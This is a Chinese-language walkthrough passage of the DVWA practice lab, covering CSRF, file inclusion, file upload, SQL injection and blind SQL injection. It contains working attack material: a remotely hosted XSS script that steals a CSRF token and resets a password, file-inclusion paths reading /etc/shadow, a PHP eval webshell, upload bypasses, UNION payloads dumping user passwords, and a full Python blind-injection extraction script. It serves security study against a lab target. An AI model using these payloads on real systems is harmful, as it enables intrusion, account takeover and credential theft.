    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); 
} 

// Generate Anti-CSRF token 
generateSessionToken(); 

?>

代码审计可知，high级别加入了token验证机制，每次提交会先检查token，token如果不对将直接拒绝修改密码，因为我们要想办法获取到token，因为涉及到跨域的问题，因此我们需要借助DOM XSS漏洞

在攻击者的服务器上放置xss.js

alert(document.cookie);
var theUrl = 'http://127.0.0.1/dvwa/vulnerabilities/csrf/';
if(window.XMLHttpRequest) {
    xmlhttp = new XMLHttpRequest();
}else{
    xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
var count = 0;
xmlhttp.withCredentials = true;
xmlhttp.onreadystatechange=function(){
    if(xmlhttp.readyState ==4 && xmlhttp.status==200)
    {
        var text = xmlhttp.responseText;
        var regex = /user_token\' value\=\'(.*?)\' \/\>/;
        var match = text.match(regex);
        console.log(match);
        alert(match[1]);
            var token = match[1];
                var new_url = 'http://127.0.0.1/dvwa/vulnerabilities/csrf/?user_token='+token+'&password_new=hello&password_conf=hello&Change=Change';
                if(count==0){
                    count++;
                    xmlhttp.open("GET",new_url,false);
                    xmlhttp.send();
                }
                

    }
};
xmlhttp.open("GET",theUrl,false);
xmlhttp.send();

在DOM XSS界面访问如下界面，即可修改密码为hello

http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=English#<script src="http://35.194.165.4/Webtest/DVWA/xss.js"></script>

Impossible

<?php 

if( isset( $_GET[ 'Change' ] ) ) { 
    // Check Anti-CSRF token 
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 

    // Get input 
    $pass_curr = $_GET[ 'password_current' ]; 
    $pass_new  = $_GET[ 'password_new' ]; 
    $pass_conf = $_GET[ 'password_conf' ]; 

    // Sanitise current password input 
    $pass_curr = stripslashes( $pass_curr ); 
    $pass_curr = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_curr ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); 
    $pass_curr = md5( $pass_curr ); 

    // Check that the current password is correct 
    $data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' ); 
    $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR ); 
    $data->bindParam( ':password', $pass_curr, PDO::PARAM_STR ); 
    $data->execute(); 

    // Do both new passwords match and does the current password match the user? 
    if( ( $pass_new == $pass_conf ) && ( $data->rowCount() == 1 ) ) { 
        // It does! 
        $pass_new = stripslashes( $pass_new ); 
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); 
        $pass_new = md5( $pass_new ); 

        // Update database with new password 
        $data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' ); 
        $data->bindParam( ':password', $pass_new, PDO::PARAM_STR ); 
        $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR ); 
        $data->execute(); 

        // Feedback for the user 
        echo "<pre>Password Changed.</pre>"; 
    } 
    else { 
        // Issue with passwords matching 
        echo "<pre>Passwords did not match or current password incorrect.</pre>"; 
    } 
} 

// Generate Anti-CSRF token 
generateSessionToken(); 

?>

Impossible利用PDO来控制sql注入，修改密码时要求输入原密码，因此无论如何，若不知道之前的密码，怎么都无法修改密码

File Inclusion

文件包含（漏洞），是指当服务器开启allow_url_include选项时，就可以通过php的某些特性函数（include()，require()和include_once()，require_once()）利用url去动态包含文件，此时如果没有对文件来源进行严格审查，就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞，远程文件包含漏洞是因为开启了php配置中的allow_url_fopen选项（选项开启之后，服务器允许包含一个远程的文件）。

Low

<?php 

// The page we wish to display 
$file = $_GET[ 'page' ]; 

?>

可以看到page参数没有经过任何过滤，可以读取任意文件

本地文件包含

http://127.0.0.1/dvwa/vulnerabilities/fi/?page=/etc/shadow		#读取shadow文件
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=../../../2.txt	
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=C:\Users\Administrator\Desktop\password.txt				可以读取本地文件

php版本小于5.3.4的服务器中，当Magic_quote_gpc选项为off时，我们可以在文件名中使用%00进行截断，也就是说文件名中%00后的内容不会被识别

远程文件包含

当服务器的php配置中，选项allow_url_fopen与allow_url_include为开启状态时，服务器会允许包含远程服务器上的文件，如果对文件来源没有检查的话，就容易导致任意远程代码执行。

在服务器端写入文件phpinfo.txt，内容为<?php phpinfo();>

下面进行远程文件包含

http://127.0.0.1/dvwa/vulnerabilities/fi/?page=http://服务器ip/phpinfo.txt

可以对page参数进行url编码隐藏

Medium

<?php 

// The page we wish to display 
$file = $_GET[ 'page' ]; 

// Input validation 
$file = str_replace( array( "http://", "https://" ), "", $file ); 
$file = str_replace( array( "../", "..\"" ), "", $file ); 

?>

代码审计可知，medium将http://、https:// 、../、..\替换为空，但我们仍然可以进行双写绕过（只影响相对路径，绝对路径不受影响）

http://127.0.0.1/dvwa/vulnerabilities/fi/?page=..././..././..././1.txt

远程文件包含

http://127.0.0.1/dvwa/vulnerabilities/fi/?page=hthttp://tp://服务器ip/phpinfo.txt

High

<?php 

// The page we wish to display 
$file = $_GET[ 'page' ]; 

// Input validation 
if( !fnmatch( "file*", $file ) && $file != "include.php" ) { 
    // This isn't the page we want! 
    echo "ERROR: File not found!"; 
    exit; 
} 

?>

fnmatch按照指定的模式来匹配文件名或字符串，这里要求page参数的开头必须是file，但我们可以通过file协议绕过

http://127.0.0.1/dvwa/vulnerabilities/fi/?page=file:///C:\Users\Administrator\Desktop\password.txt

Impossible

<?php 

// The page we wish to display 
$file = $_GET[ 'page' ]; 

// Only allow include.php or file{1..3}.php 
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) { 
    // This isn't the page we want! 
    echo "ERROR: File not found!"; 
    exit; 
} 

?>

限定了只能够访问file1.php、file2.php、file3.php,基本防御了文件包含漏洞

File upload

Low

<?php 

if( isset( $_POST[ 'Upload' ] ) ) { 
    // Where are we going to be writing to? 
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 

    // Can we move the file to the upload folder? 
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { 
        // No 
        echo '<pre>Your image was not uploaded.</pre>'; 
    } 
    else { 
        // Yes! 
        echo "<pre>{$target_path} succesfully uploaded!</pre>"; 
    } 
} 

?>

可以看到low级别的代码没有进行任何过滤，可以直接上传一句话木马

一句话木马如下shell.php，内容如下

<?php @eval($_POST['shell']);?>

上传成功并且知道路径，可以直接菜刀连接获得shell

Medium

<?php 

if( isset( $_POST[ 'Upload' ] ) ) { 
    // Where are we going to be writing to? 
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 

    // File information 
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ]; 
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 

    // Is it an image? 
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && 
        ( $uploaded_size < 100000 ) ) { 

        // Can we move the file to the upload folder? 
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { 
            // No 
            echo '<pre>Your image was not uploaded.</pre>'; 
        } 
        else { 
            // Yes! 
            echo "<pre>{$target_path} succesfully uploaded!</pre>"; 
        } 
    } 
    else { 
        // Invalid file 
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 
    } 
} 

?>

medium级别限制了上传文件大小和文件类型，文件大小没有问题(一句话木马就一句话)，关于文件类型有以下方式绕过

（1）抓包更改文件后缀

令我们一句话木马文件为shell.php.jpg

将shell.php.png改为shell.php，发送数据，文件上传成功，连接菜刀getshell

（2）利用文件包含漏洞解析文件上传图片

将shell.php保存在shell.png，上传成功

利用蚁剑，先登录网站保存cookie，然后利用文件包含漏洞把png解析为php，链接如下

http://127.0.0.1/dvwa/vulnerabilities/fi/?page=D:\phpStudy\WWW\DVWA\hackable\uploads\shell.png

蚁剑连接getshell

High

<?php 

if( isset( $_POST[ 'Upload' ] ) ) { 
    // Where are we going to be writing to? 
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 

    // File information 
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); 
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ]; 

    // Is it an image? 
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) && 
        ( $uploaded_size < 100000 ) && 
        getimagesize( $uploaded_tmp ) ) { 

        // Can we move the file to the upload folder? 
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) { 
            // No 
            echo '<pre>Your image was not uploaded.</pre>'; 
        } 
        else { 
            // Yes! 
            echo "<pre>{$target_path} succesfully uploaded!</pre>"; 
        } 
    } 
    else { 
        // Invalid file 
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 
    } 
} 

?>

代码审计可知，high级别的代码进行了文件头检测，但我们可以通过图片一句话绕过

准备1.php和1.jpg，Dos界面执行如下命令

copy 1.jpg/b+1.php/a shell.jpg

一句话木马制作成功，上传成功

同样利用文件包含漏洞进行解析

http://127.0.0.1/dvwa/vulnerabilities/fi/?page=file:///D:\phpStudy\WWW\DVWA\hackable\uploads\shell.jpg

成功getshell

Impossible

<?php 

if( isset( $_POST[ 'Upload' ] ) ) { 
    // Check Anti-CSRF token 
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 


    // File information 
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); 
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ]; 
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ]; 

    // Where are we going to be writing to? 
    $target_path   = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/'; 
    //$target_file   = basename( $uploaded_name, '.' . $uploaded_ext ) . '-'; 
    $target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext; 
    $temp_file     = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) ); 
    $temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext; 

    // Is it an image? 
    if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) && 
        ( $uploaded_size < 100000 ) && 
        ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) && 
        getimagesize( $uploaded_tmp ) ) { 

        // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD) 
        if( $uploaded_type == 'image/jpeg' ) { 
            $img = imagecreatefromjpeg( $uploaded_tmp ); 
            imagejpeg( $img, $temp_file, 100); 
        } 
        else { 
            $img = imagecreatefrompng( $uploaded_tmp ); 
            imagepng( $img, $temp_file, 9); 
        } 
        imagedestroy( $img ); 

        // Can we move the file to the web root from the temp folder? 
        if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) { 
            // Yes! 
            echo "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>"; 
        } 
        else { 
            // No 
            echo '<pre>Your image was not uploaded.</pre>'; 
        } 

        // Delete any temp files 
        if( file_exists( $temp_file ) ) 
            unlink( $temp_file ); 
    } 
    else { 
        // Invalid file 
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 
    } 
} 

// Generate Anti-CSRF token 
generateSessionToken(); 

?>

SQL Injection

1.判断是否存在注入，注入是字符型还是数字型

2.猜解SQL查询语句中的字段数

3.确定显示的字段顺序

4.获取当前数据库

5.获取数据库中的表

6.获取表中的字段名

7.下载数据

Low

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    mysqli_close($GLOBALS["___mysqli_ston"]);
}

?>

Low级别没有进行任何的过滤与防御，可以直接进行SQL注入

（1）判断是否存在注入及判断注入类型

1 							可以显示
1'							报错
1' and '1'='2 				查询结果为空
1' or '1'='1				所有结果全被列出

说明存在字符型注入

（2）判断字段数

1' order by 10# 			#报错
1’ order by 5#				#报错
1' order by 3#				#报错
1’ order by 2#				#正常显示

说明存在两个字段

（3）判断显示的字段顺序

1' union select 1,2 #					#测试显位情况

（4）猜数据库名

1' union select 1,database() #			#猜数据库名

数据库名为dvwa

（5）猜表名

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #

得到数据库名为user和guestbook

（6）猜列名

1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

得到列名

（7）下载数据

1' union select user,password from users #

得到用户名和密码

Medium

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Display values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>

利用mysqli_real_escape_string转义了常用的注入字符，同时用下拉菜单输入控制长度为1，

但可以通过抓包更改

（1)判断是否存在注入及注入类型

1 							#正常显示
1'          				#报错
1' or '1'='1				#报错
1 and 1=2					#无显示数据
1 or 1=1					#正常显示

说明存在数字型注入，因此mysqli_real_escape_string的转义就没有用处了

（2）判断字段数

1 order by 10#				#报错
1 order by 5#				#报错
1 order by 3#				#报错
1 order by 2#				正常显示

说明存在两个字段

（3）判断字段显示顺序

1 union select 1,2 #

（4）猜数据库名

1 union select 1,database()#

数据库名为dvwa

（5）猜表名

1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

(6)猜列名

1 union select 1，group(column_name) from information_schema.columns where table_name='users'#				#失败，因为'被过滤掉了
id=1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273#			#可以十六进制绕过

（7）下载数据

1 union select user,password from users #

High

<?php

if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);        
}

?>

审计代码可知，High等级将id的长度限制到了1，但我们可以通过#将其注释掉使其不起作用，注入过程如下：

（1）判断是否存在注入点，判断注入类型

1# 						#正常显示
1'#						#正常显示
1 or 1=1#				#正常显示
1' or '1'='1'#			#全部显示

存在字符型注入

（2）判断字段数

1’ order by 1#			#正常显示
1' order by 2#			#正常显示
1’ order by 3#			#报错

证明字段数为2

（3）判断字段显示顺序

1'union select 1,2#

(4)判断数据库名

1' union select 1,database()#

（5）判断表名

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #

(6) 判断列名

1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

(7)下载数据

1' union select user,password from users#

Impossible

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();
        $row = $data->fetch();

        // Make sure only 1 result is returned
        if( $data->rowCount() == 1 ) {
            // Get values
            $first = $row[ 'first_name' ];
            $last  = $row[ 'last_name' ];

            // Feedback for end user
            echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

POD实现了代码与数据分离，无法SQL注入

SQL Injection(Blind)

盲注分为基于布尔的盲注，基于时间的盲注和基于报错的盲注，盲注同样是因为输入的语句未经规范和过滤，造成了原有的sql语句结构改变，但不同与sql injection的是，盲注漏洞只能返回yes /no。

1.判断是否存在注入，注入是字符型还是数字型

2.猜解当前数据库名

3.猜解数据库中的表名

4.猜解表中的字段名

5.猜解数据

Low

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Get input
    $id = $_GET[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

审计可知，Low等级对输入没有做任何过滤，可以直接注入

（以下yes代表返回为User ID exists in the database，no代表User ID is MISSING from the database)

基于布尔的盲注

（1)判断注入点及注入类型

1										#yes
1'										#no
1 or 1=1								#无显示
1'or'1'='1								#yes
1'or'1'='1'#							#yes

证明存在字符型注入

（2）猜数据库长度

1' and length(database())=1 #			#no
1' and length(database())=2 #			#no
1' and length(database())=3 #			#no
1' and length(database())=4 #			#yes
1' and length(database())=5 #			#no

证明数据库长度为4

（3）猜数据库名（一个字母一个字母的来）

二分法(推荐）或遍历

最好利用python写脚本实现

下列只展示yes过程

遍历法
1' and substr(database(),1,1)='d'# 	
1' and substr(database(),2,1)='v'#
1' and substr(database(),3,1)='w'#
1' and substr(database(),4,1)='v'#
二分法
1' and ascii(substr(database(),1,1))<100 #
1' and ascii(substr(database(),1,1))>100 #
1' and ascii(substr(database(),2,1))<118 #
1' and ascii(substr(database(),2,1))>118 #
1' and ascii(substr(database(),1,1))<119 #
1' and ascii(substr(database(),1,1))>119
1' and ascii(substr(database(),1,1))<97 #
1' and ascii(substr(database(),1,1))>97 #

（4）猜表

猜数量

猜第1n个表名长度+猜第1n个表名

（5）猜列

猜列数

猜1~n个列名长度+猜列名

基于时间的盲注

（1）判断注入是否存在及注入类型

1' and sleep(5)#		#有明显延迟
1 and sleep(5)#			#无延迟

（2）猜数据库名长度

猜数据库名

（3）猜表数

猜1~n表名长度和表名

（4）猜列数

猜1~n列名长度和列名

Medium

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    //mysql_close();
}

?>

限制了输入为下拉框，但可以通过抓包改参，因为是数字型注入，所以mysqli_real_escape_string没有用了

High

<?php

if( isset( $_COOKIE[ 'id' ] ) ) {
    // Get input
    $id = $_COOKIE[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Might sleep a random amount
        if( rand( 0, 5 ) == 3 ) {
            sleep( rand( 2, 4 ) );
        }

        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

企图限制长度为1,可以通过#给注释掉，同sql 注入

Impossible

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();

        // Get results
        if( $data->rowCount() == 1 ) {
            // Feedback for end user
            echo '<pre>User ID exists in the database.</pre>';
        }
        else {
            // User wasn't found, so the page wasn't!
            header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

            // Feedback for end user
            echo '<pre>User ID is MISSING from the database.</pre>';
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

附SQL Injection（blind）基于布尔盲注的脚本（python）（瞎写的，不足请指正）

import requests
import re
#登录获取cookie
sess=requests.session()
url='http://192.168.1.128/dvwa/login.php'
text=sess.get(url).text
pattern=re.compile(r'user_token\' value=\'.*\' />')
token=''.join(pattern.findall(text))
token=token.replace('user_token\' value=\'','')
token=token.replace('\' />','')
data={
    'username':'admin',
    'password':'password',
    'Login':'Login',
    'user_token':token
    }
result=sess.post('http://192.168.1.128/dvwa/login.php',data)
print("登陆成功")


dblength=0
#爆破数据库名长度
while True:
    url='http://192.168.1.128/dvwa/vulnerabilities/sqli_blind/index.php?id=-1%27 or length(database())='+str(dblength)+'%23&Submit=Submit%23'
    text=sess.get(url).text
    if 'User ID is MISSING from the database' in text:
        dblength=dblength+1
    else:
        break
print("数据库长度为%d"%dblength)

#爆破数据库名
dbname=''
for i in range(dblength):
        for j in range(32,127):
            url='http://192.168.1.128/dvwa/vulnerabilities/sqli_blind/index.php?id=-1%27 or ascii(substr(database(),'+str(i+1)+',1))='+str(j)+' %23&Submit=Submit%23'
            text=sess.get(url).text
            if 'User ID is MISSING from the database' in text:
                continue
            else:
                dbname=dbname+chr(j)
                break
print("数据库名为%s"%dbname)

#爆破表数量
tablenum=0
while True:
    url='http://192.168.1.128/dvwa/vulnerabilities/sqli_blind/index.php?id=-1%27 or (select count(table_name) from information_schema.tables where table_schema=database())='+str(tablenum)+'%23&Submit=Submit%23'
    text=sess.get(url).text
    if 'User ID is MISSING from the database' in text:
        tablenum=tablenum+1
    else:
        break
print("表数量为%d"%tablenum)

#爆破表长度
tablelength=[]
for i in range(tablenum):
    temlength=0
    while True:
        url='http://192.168.1.128/dvwa/vulnerabilities/sqli_blind/index.php?id=-1%27 or length(substr((select table_name from information_schema.tables where table_schema=database() limit '+str(i)+',1),1))='+str(temlength)+' %23&Submit=Submit%23'
        text=sess.get(url).text
        if 'User ID is MISSING from the database' in text:
            temlength=temlength+1
            continue
        else:
            tablelength.append(temlength)
            break
print("表的名称长度数组为：",end='%s\n'%tablelength)

#爆破表名
tablename=[]
for i in range(tablenum):
    temname=''
    for j in range(tablelength[i]):
        for k in range(32,127):
            url='http://192.168.1.128/dvwa/vulnerabilities/sqli_blind/index.php?id=-1%27 or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit '+str(i)+',1),'+str(j+1)+',1))='+str(k)+' %23&Submit=Submit%23'
            text=sess.get(url).text
            if 'User ID is MISSING from the database' in text:
                continue
            else:
                temname=temname+chr(k)
                break
    tablename.append(temname)
print("表名数组为：",end='%s\n'%tablename)

#爆破users表的字段数量
columnnum=0
while True:
    url='http://192.168.1.128/dvwa/vulnerabilities/sqli_blind/index.php?id=-1%27 or (select count(column_name) from information_schema.columns where table_schema=database() and table_name=%27users%27)='+str(columnnum)+'%23&Submit=Submit%23'
    text=sess.get(url).text
    if 'User ID is MISSING from the database' in text:
        columnnum=columnnum+1
    else:
        break
print("users字段数量:%d"%columnnum)

#爆破users表字段长度
columnlength=[]
for i in range(columnnum):
    temlength=0
    while True:
        url='http://192.168.1.128/dvwa/vulnerabilities/sqli_blind/index.php?id=-1%27 or length(substr((select column_name from information_schema.columns where table_schema=database() and table_name=%27users%27 limit '+str(i)+',1),1))='+str(temlength)+' %23&Submit=Submit%23'
        text=sess.get(url).text
        if 'User ID is MISSING from the database' in text:
            temlength=temlength+1
            continue
        else:
            columnlength.append(temlength)
            break
print("users表字段长度数组:",end='%s\n'%columnlength)

#爆破users表字段名
columnname=[]
for i in range(columnnum):
    temname=''
    for j in range(columnlength[i]):
        for k in range(32,127):
            url='http://192.168.1.128/dvwa/vulnerabilities/sqli_blind/index.php?id=-1%27 or ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name=%27users%27 limit '+str(i)+',1),'+str(j+1)+',1))='+str(k)+' %23&Submit=Submit%23'
            text=sess.get(url).text
            if 'User ID is MISSING from the database' in text:
                continue
            else:
                temname=temname+chr(k)
                break
    columnname.append(temname)
print("users字段数组为：",end='%s\n'%columnname)

#爆破users表的数据数量
datanum=0
while True:
    url='http://192.168.1.128/dvwa/vulnerabilities/sqli_blind/index.php?id=-1%27 or (select count(*) from users)='+str(datanum)+'%23&Submit=Submit%23'
    text=sess.get(url).text
    if 'User ID is MISSING from the database' in text:
        datanum=datanum+1
    else:
        break
print("users表数据数量为%d"%datanum)

#爆破所有数据长度
datalength=[]
for i in range(datanum):        #每组数据
    temlength=[]
    for j in range(columnnum):  #每个字段
        tem=0
        while True:   
            url='http://192.168.1.128/dvwa/vulnerabilities/sqli_blind/index.php?id=-1%27 or length(substr((select '+columnname[j]+' from users limit '+str(i)+',1),1))='+str(tem)+' %23&Submit=Submit%23'
            text=sess.get(url).text
            if 'User ID is MISSING from the database' in text:
                tem=tem+1
                continue
            else:
                break
        temlength.append(tem)
    datalength.append(temlength)
print("users数据长度数组为：",end='%s\n'%datalength)

#爆破数据
data=[]
for i in range(datanum):        #每组数据
    temdata=[]
    for j in range(columnnum):  #每个字段
        tem=''
        for  pos in range(datalength[i][j]):    #每个位置
            for k in range(32,127):                                        
                url='http://192.168.1.128/dvwa/vulnerabilities/sqli_blind/index.php?id=-1%27 or ascii(substr((select '+columnname[j]+' from users limit '+ str(i)+',1),'+str(pos+1)+',1))='+str(k)+' %23&Submit=Submit%23'
                text=sess.get(url).text
                if 'User ID is MISSING from the database' in text:
                    continue
                else:
                    tem=tem+chr(k)
                    break
        temdata.append(tem)
    data.append(temdata)
    print(temdata)      
print("users数据数组为：",end='%s\n'%data)

